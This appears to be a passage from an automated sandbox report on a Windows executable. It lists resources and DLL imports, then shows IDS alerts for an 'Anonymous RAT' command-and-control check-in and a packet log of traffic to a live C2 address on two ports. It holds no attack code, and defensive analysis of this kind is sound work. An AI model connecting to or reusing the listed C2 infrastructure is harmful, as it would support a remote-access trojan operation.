RT_CURSOR	0x1d4fc	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"			0.35064935064935066
RT_CURSOR	0x1d630	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"			0.4512987012987013
RT_CURSOR	0x1d764	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"			0.39285714285714285
RT_CURSOR	0x1d898	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_CURSOR	0x1d9cc	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"			0.32142857142857145
RT_CURSOR	0x1db00	0x134	data			0.4805194805194805
RT_CURSOR	0x1dc34	0x134	data			0.38311688311688313
RT_CURSOR	0x1dd68	0x134	data			0.36038961038961037
RT_CURSOR	0x1de9c	0x134	data			0.4090909090909091
RT_CURSOR	0x1dfd0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0x1e104	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0x1e2d4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0x1e4a4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x1e674	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0x1e844	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x1ea14	0xc0	Device independent bitmap graphic, 11 x 11 x 4, image size 88	Russian	Russia	0.40625
RT_BITMAP	0x1ead4	0xc0	Device independent bitmap graphic, 11 x 11 x 4, image size 88	Russian	Russia	0.40625
RT_BITMAP	0x1eb94	0xa8	Device independent bitmap graphic, 10 x 8 x 4, image size 64			0.49404761904761907
RT_BITMAP	0x1ec3c	0x134	Device independent bitmap graphic, 18 x 17 x 4, image size 204			0.37337662337662336
RT_BITMAP	0x1ed70	0xb8	Device independent bitmap graphic, 10 x 10 x 4, image size 80	Russian	Russia	0.41304347826086957
RT_BITMAP	0x1ee28	0xb8	Device independent bitmap graphic, 11 x 10 x 4, image size 80	Russian	Russia	0.45652173913043476
RT_BITMAP	0x1eee0	0xb8	Device independent bitmap graphic, 10 x 10 x 4, image size 80	Russian	Russia	0.42391304347826086
RT_BITMAP	0x1ef98	0xb8	Device independent bitmap graphic, 11 x 10 x 4, image size 80	Russian	Russia	0.44565217391304346
RT_BITMAP	0x1f050	0x90	Device independent bitmap graphic, 8 x 10 x 4, image size 40			0.4861111111111111
RT_BITMAP	0x1f0e0	0x11c	Device independent bitmap graphic, 38 x 9 x 4, image size 180			0.4507042253521127
RT_BITMAP	0x1f1fc	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5208333333333334
RT_BITMAP	0x1f2bc	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42857142857142855
RT_BITMAP	0x1f39c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.4955357142857143
RT_BITMAP	0x1f47c	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.5285714285714286
RT_BITMAP	0x1f508	0xc8	Device independent bitmap graphic, 12 x 12 x 4, image size 96	Russian	Russia	0.41
RT_BITMAP	0x1f5d0	0xc8	Device independent bitmap graphic, 12 x 12 x 4, image size 96	Russian	Russia	0.39
RT_BITMAP	0x1f698	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.45
RT_BITMAP	0x1f724	0x238	Device independent bitmap graphic, 29 x 29 x 4, image size 464			0.25
RT_BITMAP	0x1f95c	0x238	Device independent bitmap graphic, 29 x 29 x 4, image size 464			0.20950704225352113
RT_BITMAP	0x1fb94	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.5071428571428571
RT_BITMAP	0x1fc20	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.5142857142857142
RT_BITMAP	0x1fcac	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.4857142857142857
RT_BITMAP	0x1fd38	0x238	Device independent bitmap graphic, 29 x 29 x 4, image size 464			0.21654929577464788
RT_BITMAP	0x1ff70	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.3232758620689655
RT_BITMAP	0x20058	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.28448275862068967
RT_BITMAP	0x20140	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.2629310344827586
RT_BITMAP	0x20228	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.33189655172413796
RT_ICON	0x20310	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m			0.2473404255319149
RT_ICON	0x20778	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m			0.15655737704918032
RT_ICON	0x21100	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m			0.12101313320825516
RT_ICON	0x221a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m			0.07655601659751038
RT_ICON	0x24750	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m			0.056211620217288615
RT_ICON	0x28978	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 2835 x 2835 px/m			0.03660395207063275
RT_ICON	0x31e20	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m			0.027135336566899326
RT_ICON	0x42648	0x1104	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9687786960514233
RT_ICON	0x4374c	0x2388	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced			0.9195250659630607
RT_DIALOG	0x45ad4	0xcc	data	English	United States	0.6911764705882353
RT_DIALOG	0x45ba0	0x1b4	data	English	United States	0.5458715596330275
RT_STRING	0x45d54	0x40	data	English	United States	0.609375
RT_STRING	0x45d94	0x81a	data	English	United States	0.3322082931533269
RT_STRING	0x465b0	0x302	data	English	United States	0.4649350649350649
RT_STRING	0x468b4	0x298	data	English	United States	0.46536144578313254
RT_STRING	0x46b4c	0x328	data	English	United States	0.4405940594059406
RT_STRING	0x46e74	0xc2	data	English	United States	0.5721649484536082
RT_STRING	0x46f38	0x3e	data	Chinese	China	0.6935483870967742
RT_STRING	0x46f78	0x5ce	data	English	United States	0.37012113055181695
RT_STRING	0x47548	0x188	data	English	United States	0.4336734693877551
RT_STRING	0x476d0	0x5fa	OpenPGP Public Key	English	United States	0.3457516339869281
RT_STRING	0x47ccc	0x97c	data	English	United States	0.2759472817133443
RT_STRING	0x48648	0x3de	data	English	United States	0.33636363636363636
RT_STRING	0x48a28	0x114	data	English	United States	0.5652173913043478
RT_STRING	0x48b3c	0x3ba	data	English	United States	0.34276729559748426
RT_STRING	0x48ef8	0x9a	data	English	United States	0.5844155844155844
RT_STRING	0x48f94	0x216	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.46254681647940077
RT_STRING	0x491ac	0x624	data	English	United States	0.3575063613231552
RT_STRING	0x497d0	0x660	data	English	United States	0.3474264705882353
RT_STRING	0x49e30	0x2e2	data	English	United States	0.4037940379403794
RT_STRING	0x4a114	0x6c	data			0.6851851851851852
RT_STRING	0x4a180	0x2d0	data			0.46111111111111114
RT_STRING	0x4a450	0x250	data			0.49155405405405406
RT_STRING	0x4a6a0	0x214	data			0.4567669172932331
RT_STRING	0x4a8b4	0x180	data			0.5286458333333334
RT_STRING	0x4aa34	0x1a4	data			0.5428571428571428
RT_STRING	0x4abd8	0x3c0	data			0.3489583333333333
RT_STRING	0x4af98	0x6a4	data			0.36
RT_STRING	0x4b63c	0x48c	data			0.38230240549828176
RT_STRING	0x4bac8	0x19c	data			0.5145631067961165
RT_STRING	0x4bc64	0xec	data			0.597457627118644
RT_STRING	0x4bd50	0x1a8	data			0.5
RT_STRING	0x4bef8	0x2b8	data			0.4454022988505747
RT_STRING	0x4c1b0	0x414	data			0.36398467432950193
RT_STRING	0x4c5c4	0x3b4	data			0.37658227848101267
RT_STRING	0x4c978	0x340	data			0.3762019230769231
RT_STRING	0x4ccb8	0x354	data			0.35563380281690143
RT_STRING	0x4d00c	0x2d0	data			0.4513888888888889
RT_STRING	0x4d2dc	0xd8	data			0.5694444444444444
RT_STRING	0x4d3b4	0xf0	data			0.55
RT_STRING	0x4d4a4	0x350	data			0.4033018867924528
RT_STRING	0x4d7f4	0x384	data			0.37444444444444447
RT_STRING	0x4db78	0x2d8	data			0.375
RT_RCDATA	0x4de50	0x10	data			1.5
RT_RCDATA	0x4de60	0x590	data			0.6327247191011236
RT_RCDATA	0x4e3f0	0x133db	Delphi compiled form 'TCreatePluginForm'			0.09238558069305046
RT_RCDATA	0x617cc	0x2f1a	Delphi compiled form 'TdxBarCustomizingForm'			0.25543207828827336
RT_RCDATA	0x646e8	0x4b0	Delphi compiled form 'TdxBarItemAddEditor'			0.4608333333333333
RT_RCDATA	0x64b98	0x287	Delphi compiled form 'TdxBarNameEd'			0.6058732612055642
RT_RCDATA	0x64e20	0x171	Delphi compiled form 'TdxBarSubMenuEditor'			0.7100271002710027
RT_RCDATA	0x64f94	0x1491	Delphi compiled form 'TFindForm'			0.2641975308641975
RT_RCDATA	0x66428	0x49c	Delphi compiled form 'TfrmAddGroupItems'			0.4610169491525424
RT_RCDATA	0x668c4	0x1595	Delphi compiled form 'THintForm'			0.11782805429864253
RT_RCDATA	0x67e5c	0x1aaf	Delphi compiled form 'TInputStringForm'			0.2577953447518665
RT_MESSAGETABLE	0x6990c	0x2840	data	English	United States	0.28823757763975155
RT_GROUP_CURSOR	0x6c14c	0x14	data			1.35
RT_GROUP_CURSOR	0x6c160	0x14	data			1.3
RT_GROUP_CURSOR	0x6c174	0x14	data			1.4
RT_GROUP_CURSOR	0x6c188	0x14	data			1.4
RT_GROUP_CURSOR	0x6c19c	0x14	data			1.4
RT_GROUP_CURSOR	0x6c1b0	0x14	data			1.4
RT_GROUP_CURSOR	0x6c1c4	0x14	data			1.4
RT_GROUP_CURSOR	0x6c1d8	0x14	data			1.4
RT_GROUP_CURSOR	0x6c1ec	0x14	data			1.4
RT_GROUP_CURSOR	0x6c200	0x14	data			1.4
RT_GROUP_CURSOR	0x6c214	0x14	data			1.4
RT_GROUP_CURSOR	0x6c228	0x14	data			1.4
RT_GROUP_CURSOR	0x6c23c	0x14	data			1.4
RT_GROUP_CURSOR	0x6c250	0x14	data			1.4
RT_GROUP_CURSOR	0x6c264	0x14	data			1.4
RT_GROUP_CURSOR	0x6c278	0x14	data			1.4
RT_GROUP_CURSOR	0x6c28c	0x14	data			1.4
RT_GROUP_CURSOR	0x6c2a0	0x14	data			1.4
RT_GROUP_CURSOR	0x6c2b4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x6c2c8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x6c2dc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x6c2f0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x6c304	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x6c318	0x84	data			0.7045454545454546
RT_VERSION	0x6c39c	0x3f4	data			0.475296442687747
RT_VERSION	0x6c790	0x328	data	English	United States	0.44183168316831684
RT_MANIFEST	0x6cab8	0x244	XML 1.0 document, ASCII text, with CRLF line terminators	Chinese	China	0.453448275862069

Imports

DLL	Import
COMCTL32.dll
KERNEL32.dll	GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll	CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll	GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
SHELL32.dll	SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll	CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll	VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll	__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T17:18:58.874542+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49855	156.251.17.243	17093	TCP
2025-01-03T17:20:07.767579+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49880	156.251.17.243	17093	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 17:18:54.957545042 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:54.962398052 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:54.962471962 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:55.775926113 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.775957108 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.775968075 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.775979042 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.775990963 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.776061058 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:55.986233950 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986255884 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986274958 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986287117 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986296892 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986314058 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:55.986331940 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986342907 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986352921 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.986361027 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:55.986397028 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:55.986423016 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:55.987071991 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.987157106 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.987188101 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:55.987238884 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.196806908 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.196835041 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.196845055 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.196934938 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.196973085 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.196981907 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.196985006 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197001934 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197011948 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197026968 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.197055101 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.197700024 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197710037 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197721958 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197731972 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197743893 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.197756052 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.197772980 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.198550940 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.198560953 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.198571920 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.198580980 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.198591948 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.198600054 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.198628902 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.199291945 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.251435041 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.533677101 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533705950 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533718109 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533730984 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533740997 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533747911 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.533806086 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.533823013 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533834934 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533848047 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533858061 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533869982 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533895016 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.533926964 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.533957958 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533970118 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533982038 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.533992052 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534002066 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534015894 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534027100 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534038067 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.534041882 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534065962 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.534085035 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.534104109 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534121037 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534131050 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534141064 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534151077 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534168959 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.534208059 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.534208059 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.617682934 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617722988 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617734909 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617794037 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.617858887 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617868900 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617880106 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617917061 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.617930889 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617942095 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617954016 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617954969 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.617965937 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.617990017 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.618014097 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.618700981 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618741989 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618752956 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618803978 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618804932 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.618814945 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618824959 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618844032 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.618844986 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.618875027 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.619720936 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.619731903 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.619743109 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.619752884 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.619767904 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.619771004 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.619827986 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.620215893 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620228052 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620239019 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620254993 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620265007 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620268106 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.620290041 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.620299101 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620310068 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.620342970 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.621160984 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.621171951 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.621184111 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.621216059 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.621248960 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.827867031 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.827888966 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.827899933 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.827939987 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.827980995 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828032970 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828044891 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828056097 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828066111 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828088999 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.828088999 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.828109026 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.828411102 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828474045 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828485966 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828496933 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828510046 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.828528881 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.828646898 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:56.828778028 CET	18852	49831	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:56.829153061 CET	49831	18852	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:58.869393110 CET	49855	17093	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:58.874154091 CET	17093	49855	156.251.17.243	192.168.2.4
Jan 3, 2025 17:18:58.874284029 CET	49855	17093	192.168.2.4	156.251.17.243
Jan 3, 2025 17:18:58.874541998 CET	49855	17093	192.168.2.4	156.251.17.243
